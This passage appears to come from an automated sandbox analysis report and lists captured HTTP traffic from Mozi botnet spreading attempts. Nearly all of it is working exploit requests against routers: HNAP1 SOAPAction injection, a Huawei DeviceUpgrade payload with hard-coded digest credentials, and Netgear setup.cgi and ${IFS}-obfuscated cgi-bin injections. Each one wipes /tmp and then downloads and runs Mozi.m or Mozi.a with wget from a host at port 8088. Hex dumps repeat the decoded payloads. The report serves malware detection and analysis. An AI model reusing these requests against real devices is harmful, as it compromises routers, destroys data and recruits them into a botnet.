70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 7.11.145.117:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 42.174.36.196:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 184.123.14.48:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 151.190.149.220:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 128.71.216.213:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 25.226.198.155:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 72.179.124.14:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 107.181.7.251:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 